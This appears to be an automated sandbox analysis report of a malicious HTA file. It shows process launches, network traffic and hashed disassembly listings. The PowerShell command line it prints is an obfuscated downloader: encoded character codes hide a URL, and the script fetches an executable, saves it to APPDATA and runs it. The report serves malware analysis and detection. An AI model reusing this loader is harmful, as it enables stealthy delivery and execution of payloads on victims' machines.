Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49741	93.93.131.124	443	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Direction	Data
2023-10-12 13:29:00 UTC	OUT	GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1 Host: the.earth.li Connection: Keep-Alive
2023-10-12 13:29:00 UTC	IN	HTTP/1.1 302 Found Date: Thu, 12 Oct 2023 13:29:00 GMT Server: Apache Location: https://the.earth.li/~sgtatham/putty/0.79/w64/putty.exe Content-Length: 302 Connection: close Content-Type: text/html; charset=iso-8859-1
2023-10-12 13:29:00 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 2e 65 61 72 74 68 2e 6c 69 2f 7e 73 67 74 61 74 68 61 6d 2f 70 75 74 74 79 2f 30 2e 37 39 2f 77 36 34 2f 70 75 74 74 79 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://the.earth.li/~sgtatham/putty/0.79/w64/putty.exe">here</a>.</p><hr><address>Apache Server at

Target ID:	0
Start time:	15:28:55
Start date:	12/10/2023
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\epah.hta"
Imagebase:	0xff0000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:28:56
Start date:	12/10/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function LxGUVY($ULTnO, $cKfTKhE){[IO.File]::WriteAllBytes($ULTnO, $cKfTKhE)};function ZFTHtJe($ULTnO){if($ULTnO.EndsWith((afdAOkcp @(31653,31707,31715,31715))) -eq $True){Start-Process (afdAOkcp @(31721,31724,31717,31707,31715,31715,31658,31657,31653,31708,31727,31708)) $ULTnO}else{Start-Process $ULTnO}};function raCMRIKEt($myHoR){$CSAPcdTh = New-Object (afdAOkcp @(31685,31708,31723,31653,31694,31708,31705,31674,31715,31712,31708,31717,31723));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$cKfTKhE = $CSAPcdTh.DownloadData($myHoR);return $cKfTKhE};function afdAOkcp($SsayQt){$iUQgIbjjg=31607;$WnZmplQpi=$Null;foreach($geCfq in $SsayQt){$WnZmplQpi+=[char]($geCfq-$iUQgIbjjg)};return $WnZmplQpi};function WEYxOo(){$hKmeWVT = $env:APPDATA + '\';$LUFdtejyB = raCMRIKEt (afdAOkcp @(31711,31723,31723,31719,31722,31665,31654,31654,31723,31711,31708,31653,31708,31704,31721,31723,31711,31653,31715,31712,31654,31733,31722,31710,31723,31704,31723,31711,31704,31716,31654,31719,31724,31723,31723,31728,31654,31715,31704,31723,31708,31722,31723,31654,31726,31661,31659,31654,31719,31724,31723,31723,31728,31653,31708,31727,31708));$sUEvB = $hKmeWVT + 'putty.exe';LxGUVY $sUEvB $LUFdtejyB;ZFTHtJe $sUEvB;;;;}WEYxOo;
Imagebase:	0x650000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:28:56
Start date:	12/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 07DC4978 Relevance: 9.2, Strings: 7, Instructions: 411COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC4A23
(bq, xrefs: 07DC4C8E
,etq, xrefs: 07DC4B83
$^q, xrefs: 07DC4B37
tP^q, xrefs: 07DC4AB1
$^q, xrefs: 07DC4B47
tP^q, xrefs: 07DC4ABD

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: (bq$,etq$tP^q$tP^q$$^q$$^q$$^q
API String ID: 0-2870348386
Opcode ID: 8956b9067e4628e458f533d70157e15741bc5026db22a09f68feaba1962e10c6
Instruction ID: 5ef56ab0382a3501f69b86e21c0e055d3916d462ed99026757a1c793faa49def
Opcode Fuzzy Hash: 8956b9067e4628e458f533d70157e15741bc5026db22a09f68feaba1962e10c6
Instruction Fuzzy Hash: 03D134B07042869FC714DB689564A6AFFE3AF86314F18C0AED5059F365DE32DC41C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 07DC1210 Relevance: 6.5, Strings: 5, Instructions: 273COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC143E
4'^q, xrefs: 07DC14C7
$^q, xrefs: 07DC1494
4'^q, xrefs: 07DC14BB
$^q, xrefs: 07DC14A0

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: 621c9ab3a2f528e2829080a621b95d5e9b5e900166969cbab491cabc779da856
Instruction ID: e7776ac80f638d98c7b7633e956499355475290dcc90d9e6f2edf9fa3c2f7e15
Opcode Fuzzy Hash: 621c9ab3a2f528e2829080a621b95d5e9b5e900166969cbab491cabc779da856
Instruction Fuzzy Hash: A19124F1B1422FCFCB15DA6994006AAFBF2AF82210F14817ED455CF257EA36C945C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 07DC495B Relevance: 3.9, Strings: 3, Instructions: 140COMMON

Download Yara Rule

Strings

$^q, xrefs: 07DC4A23
$^q, xrefs: 07DC4B37
tP^q, xrefs: 07DC4AB1

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$$^q$$^q
API String ID: 0-1983491577
Opcode ID: 60a43c40b53d6c7fc8c86a9573c0e8116c293a8a8f2c6802754b7158fac3d8bd
Instruction ID: 38c2ae78a5545e9fcee11aab314e55a3e809d20f250ecb3e4b11c98fcc3688db
Opcode Fuzzy Hash: 60a43c40b53d6c7fc8c86a9573c0e8116c293a8a8f2c6802754b7158fac3d8bd
Instruction Fuzzy Hash: E3519DB0A00286DFDB28CF59C6A4B99FFF2AB85314F19C1AED4059B265CB31DC41CB55

Uniqueness

Uniqueness Score: -1.00%

Function 04F4B2A0 Relevance: 3.2, Strings: 2, Instructions: 669COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 04F4B42F
LR^q, xrefs: 04F4B34D

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: a221c9d1e145cd6d2d16b6e86e4f1a32674d1dc5ece195485480abdde921ada9
Instruction ID: 1733a354b5501b478399299f704ea526d7868439943746b6593910a40ca26f3b
Opcode Fuzzy Hash: a221c9d1e145cd6d2d16b6e86e4f1a32674d1dc5ece195485480abdde921ada9
Instruction Fuzzy Hash: F4522934B002188FDB24DB68D894BADBBB2BF85304F118199D5499B3A6DF34ED86CF51

Uniqueness

Uniqueness Score: -1.00%

Function 07DC0390 Relevance: 2.7, Strings: 2, Instructions: 174COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07DC0433
tP^q, xrefs: 07DC0427

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID: tP^q$tP^q
API String ID: 0-309238000
Opcode ID: 5caf95c6ebe3aa714da2836da375de6a55a8dbbad95050d86769caf4566c674d
Instruction ID: 8a14e215ed1c617b5386678565305498f267c22a3678306263242c91e67e373c
Opcode Fuzzy Hash: 5caf95c6ebe3aa714da2836da375de6a55a8dbbad95050d86769caf4566c674d
Instruction Fuzzy Hash: D85128B1B08226DFCB15DB68EC006ABFBE6AF85221F14C46ED549CF251DA31CC46C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04F4B290 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

(Xcq, xrefs: 04F4B42F
LR^q, xrefs: 04F4B34D

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID: (Xcq$LR^q
API String ID: 0-2856513941
Opcode ID: 131494baf47e215a49d8d6911d669399397012460d25b9c77a7a31fd1cc50f0e
Instruction ID: 18ae643e0151708941e222262b7017fce9448ce3b2fc2658e377d02287b7d29e
Opcode Fuzzy Hash: 131494baf47e215a49d8d6911d669399397012460d25b9c77a7a31fd1cc50f0e
Instruction Fuzzy Hash: 8551AF30B003148FDB24DF68C854BADBBB2FF89304F1145AAD5459B3A5DB71AD86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BF00 Relevance: .6, Instructions: 577COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3f949bf2174fe947f2e7c4a230d45ebbd33626d5221cad50d6ac8edaf72b326
Instruction ID: 1da32c2899f61682f5b0bf00e89b1643e3764e87903b148b8fd25d39c95453cc
Opcode Fuzzy Hash: c3f949bf2174fe947f2e7c4a230d45ebbd33626d5221cad50d6ac8edaf72b326
Instruction Fuzzy Hash: A6324D74A012499FCB14CF98D584AAEFBF1FF88310F258559E445AB365CB35ED42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F43670 Relevance: .6, Instructions: 550COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 995cc373f80d980c2184b776a139d3ecf52eac65da35022c8aec70442a2afa74
Instruction ID: b16a200f5a09c1cd548374e4da8f09ae9046e30c149a4efb40ba273d26cae7f1
Opcode Fuzzy Hash: 995cc373f80d980c2184b776a139d3ecf52eac65da35022c8aec70442a2afa74
Instruction Fuzzy Hash: EC321975A01209DFDB05DFA8D584A9DFBF2BF88310F258159E804AB365CB35ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F45E60 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37f3f80fae8f0e6b2825a3767b811bb00bb3dd530b866031cdbf6332beacdd46
Instruction ID: 757f3d8c8956d8f0fddd30774e3a173d98915a74046a7cbe60d6de85a9f3d21e
Opcode Fuzzy Hash: 37f3f80fae8f0e6b2825a3767b811bb00bb3dd530b866031cdbf6332beacdd46
Instruction Fuzzy Hash: A5D12B34E052589FDB05DFA8D580A9DFFB2AF89310F258155E404EB362CB35ED46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F44A98 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cff0aa4e6897c498aa1d8ff7167392067482273698ba987d8573593d84281d62
Instruction ID: 61781edb4469fd74b34aa67a778e68771f4b0b8884884ece919eecf9d485e617
Opcode Fuzzy Hash: cff0aa4e6897c498aa1d8ff7167392067482273698ba987d8573593d84281d62
Instruction Fuzzy Hash: F3D1F834A00219DFDB15DF98D584A9DFBB2FF88310F288559E805AB365CB31ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F46860 Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb21134c420dd7a3b4310cb79f9b9bca364d7693db7f2379897473b3dec31cbe
Instruction ID: 31e338e83004c56443c4dfe5dc9c3de432cd8ca308df7bb25272fb497265c478
Opcode Fuzzy Hash: fb21134c420dd7a3b4310cb79f9b9bca364d7693db7f2379897473b3dec31cbe
Instruction Fuzzy Hash: F8B19D70A042459FCB05CF5CC8949AABFB1FF8A310B158599E459DB3A2C739FC81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F429F0 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48e20dd5de1d3d1efb6d3ff554bfd4b06d92213925f01f97725eb49c51b5d0e2
Instruction ID: aeb1a6dbc36199c02ca35cf92403be4e2c7af7463965d1485895eeae5e157ba7
Opcode Fuzzy Hash: 48e20dd5de1d3d1efb6d3ff554bfd4b06d92213925f01f97725eb49c51b5d0e2
Instruction Fuzzy Hash: 94919F74A002458FCB15CF59C4949AEFBB1FF88310B2586A9E915AB3A5C735FC52CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07DC2CF5 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: def99b29585d3f9cea7390f372221d209bba176e91124313953777d9a1088140
Instruction ID: f5b602224fdc6f4e4b7c2df5411a426f8e3e365127adcc9d096a14464f8a4237
Opcode Fuzzy Hash: def99b29585d3f9cea7390f372221d209bba176e91124313953777d9a1088140
Instruction Fuzzy Hash: 5F418EF2B401129BCB15D7789810AAEFB92BFE5324B1880AED5419F359DD31D952C3F1

Uniqueness

Uniqueness Score: -1.00%

Function 04F47448 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 502a34c10c1d0e37f842dc6beb8fc9690d0d9468e6e2f52e03f842ce2e453cb8
Instruction ID: 964a8485f5ee610bb9a324e8ba4e875609743b9eeb50349da575300b2f43a706
Opcode Fuzzy Hash: 502a34c10c1d0e37f842dc6beb8fc9690d0d9468e6e2f52e03f842ce2e453cb8
Instruction Fuzzy Hash: B8416F719097D59FCB02DF6CC8A08EABFB1EF4A31071941D7D084DF2A3C629A845CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 04F43C8D Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb6481bbadc7fa312ed12a7b32d02be7af990b0cc0dcd01591b8ac5d63cfd49e
Instruction ID: 5bc9cb1465b98fd3910ea0845f5671b7f1837510f78068fcf21c529646e23424
Opcode Fuzzy Hash: eb6481bbadc7fa312ed12a7b32d02be7af990b0cc0dcd01591b8ac5d63cfd49e
Instruction Fuzzy Hash: A851B734A00209EFDB05DF98D584A9DFBF2BF88314F248559E805AB365CB35ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F42B08 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c30ebf0d0b51c7056637c78414a89bb4e8a71a0cc1838746dcb99fc0926dcd89
Instruction ID: cc6da207557c90ec4ea85ef5ef2df936418c2e23244bddca4147151accb1bdba
Opcode Fuzzy Hash: c30ebf0d0b51c7056637c78414a89bb4e8a71a0cc1838746dcb99fc0926dcd89
Instruction Fuzzy Hash: 6E413CB4A005158FCB05CF58C1989AEFBB1FF88314B1185A9E915AB364C736FC91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 07DC0610 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8b003cdf933bb4353fb9b2dff751ae4c3d8f93dee58fe6501f1ac83a5143a7f
Instruction ID: 484292d180c8d750afd687c2fbda161fdd502cb3fcb69ce4a6995cc69375856e
Opcode Fuzzy Hash: c8b003cdf933bb4353fb9b2dff751ae4c3d8f93dee58fe6501f1ac83a5143a7f
Instruction Fuzzy Hash: 022127B1740216EBDB289A7ADC04B3AF6DAABC5710F20842EE649CB394DD76D8418764

Uniqueness

Uniqueness Score: -1.00%

Function 07DC05F7 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1675051418.0000000007DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07DC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7dc0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc5d93e485b7b26eec43dd6013dfe40dc42e8700eb84abe8d67abb600abb077a
Instruction ID: 9f052fa3004105fc328fc7b079c2a4b255256ad6ed4982493ab520dbdae5d2c1
Opcode Fuzzy Hash: fc5d93e485b7b26eec43dd6013dfe40dc42e8700eb84abe8d67abb600abb077a
Instruction Fuzzy Hash: 7E21ADF5704382AFD7248A7A8C08766BFD2AFC1700F28802EE148CF3D5D8759884C361

Uniqueness

Uniqueness Score: -1.00%

Function 04F47438 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f4ba243ce99de0d4c126491d95de7c82fecee9ba4e674e62b35dc11dffe4a8f
Instruction ID: 86b3cd2293588d8db8dd1c4a689f438c888e0df1ed9146a58f4df05a8d4c3143
Opcode Fuzzy Hash: 8f4ba243ce99de0d4c126491d95de7c82fecee9ba4e674e62b35dc11dffe4a8f
Instruction Fuzzy Hash: 6B21F6B4A00259DFCB44DF59C584AAAFBF5FF88310B158599E809EB761C731F891CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F431C8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0f5b920f864e85aae786ee55e3fcbde7bd67fe89c9b0f6ba2a9fe9bac6265e1
Instruction ID: 273e9f5b6f3131e652352c190eb6a53f81b7cae992dcb18871e796e4b0753b12
Opcode Fuzzy Hash: e0f5b920f864e85aae786ee55e3fcbde7bd67fe89c9b0f6ba2a9fe9bac6265e1
Instruction Fuzzy Hash: 52213DB4A042059FCB00DF98D5909AABBF5FF89310B108599E819EB365D735FD41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BEFB Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085b17f895ea8cf9c39565074190332b3d7c597518b73483fa7b312699324aad
Instruction ID: 013a3e2224edcb78f45dc3ff204f61ced31a40245c7cd586a19154e2394d67d1
Opcode Fuzzy Hash: 085b17f895ea8cf9c39565074190332b3d7c597518b73483fa7b312699324aad
Instruction Fuzzy Hash: A021E774A006069FCB04DF89D584DAAFBB5FB88310B148555E919E7755C731FC82CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F44A89 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daff3cc45f386279c24ee3727b21f013b10304e52e5547862f7af76de1a97a83
Instruction ID: 0ac87e622606601321c2c3724490183e4df820d662f3ec7df1a7641ecf3e5e69
Opcode Fuzzy Hash: daff3cc45f386279c24ee3727b21f013b10304e52e5547862f7af76de1a97a83
Instruction Fuzzy Hash: F221E674A001159FCB04CF58C984AAEFBB1FF88310B258599E959AB761C731FC91CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 04F45E50 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f09d658846ec7d6e433d0c87f26fd449f13e377b7ea688ff442c12019e3c289
Instruction ID: cec63a29f7bee8ad38537ac7d705841794a9ce1d3f2512b48095834ee17f6fe1
Opcode Fuzzy Hash: 5f09d658846ec7d6e433d0c87f26fd449f13e377b7ea688ff442c12019e3c289
Instruction Fuzzy Hash: 84214774A00209DFCB00DF98D8809AEBBF5FF89310B158599E909AB362C731FD41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 04F431B4 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f389aea9748d8b32e10a2a12493f6b40dffabdd23cd3636334fbbee711bed3c5
Instruction ID: 1fb68937bee23ad4f17ff30e723b1794a0a2a855ad6e17fba8d88ff430b020a2
Opcode Fuzzy Hash: f389aea9748d8b32e10a2a12493f6b40dffabdd23cd3636334fbbee711bed3c5
Instruction Fuzzy Hash: CE119475F093848FC701CBA8C8605A9BFB1FF8A210B1545DAC855DB3B3C639AC06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04F43D8B Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f409e58f7f21d72d94619de42806eef973191737d4f40b23666e0534adc42a5
Instruction ID: eb95812bfa866e2e12dd0492933547e17eddbeac27a829c79bc617889c1a10bf
Opcode Fuzzy Hash: 0f409e58f7f21d72d94619de42806eef973191737d4f40b23666e0534adc42a5
Instruction Fuzzy Hash: 1A11E935A00209EFDB45CB98D484A9DFBF1BF88314F288159E805AB365CB75ED86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 035FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1669846690.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_35fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14074806f56c7b548d1a3eceab757a4c15633957445c419e378fba1196912b77
Instruction ID: e58f1eb8877b942b783cef5d296508326b14b1d3f607f0039bcaa4fe19d89efe
Opcode Fuzzy Hash: 14074806f56c7b548d1a3eceab757a4c15633957445c419e378fba1196912b77
Instruction Fuzzy Hash: 2601F7314083009FE710CA26D984767FFECFF41324F1CC96AEE480B15AD6799841C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 035FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1669846690.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_35fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f278ca9d6b2dd6f65acb723e04ff3047a87318693dfa176d31e0116cd142bfb2
Instruction ID: 768c01aabf4c68220f920a7683c295252cb6f4fb1fd01dd8cb9c27ce55ca76ab
Opcode Fuzzy Hash: f278ca9d6b2dd6f65acb723e04ff3047a87318693dfa176d31e0116cd142bfb2
Instruction Fuzzy Hash: 6B01407140E3C09FD7128B25D898B56BFB8EF47224F1D84DBD9888F1A7C2699849C772

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BE50 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4f40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98c80869330ad07201efe91d84135937b45dc72b86383e2e5a128642afdc0332
Instruction ID: 0a689de75ffaf6b1135cb00574abf91c1aad39c927d7217b7907491d5dba4cca
Opcode Fuzzy Hash: 98c80869330ad07201efe91d84135937b45dc72b86383e2e5a128642afdc0332
Instruction Fuzzy Hash: 5F01F9757452948FC705DFE8E4999AD7FB2DF85210F0141D6D944AF3A3CA24ED0187A2

Uniqueness

Uniqueness Score: -1.00%

Function 04F4BD7B Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1670154429.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false

